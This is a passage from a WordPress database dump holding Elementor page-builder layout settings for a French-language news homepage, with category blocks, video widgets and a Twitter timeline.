\",\"size\":300}},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"category\":[\"2\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1546,518,'_elementor_version','0.4'),(1547,518,'_elementor_css','a:3:{s:4:\"time\";i:1508933842;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1549,519,'_elementor_edit_mode','builder'),(1550,519,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"p72uffi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"orderby\":\"name\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\",\"title_font_size\":{\"unit\":\"px\",\"size\":19},\"use_meta\":\"\",\"use_excerpt\":\"\",\"use_button\":\"\",\"content_half_mobile\":{\"unit\":\"px\",\"size\":270},\"content_half_2_mobile\":{\"unit\":\"px\",\"size\":300}},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1551,519,'_elementor_version','0.4'),(1552,519,'_elementor_css','a:3:{s:4:\"time\";i:1508934701;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1553,520,'_elementor_edit_mode','builder'),(1554,520,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_in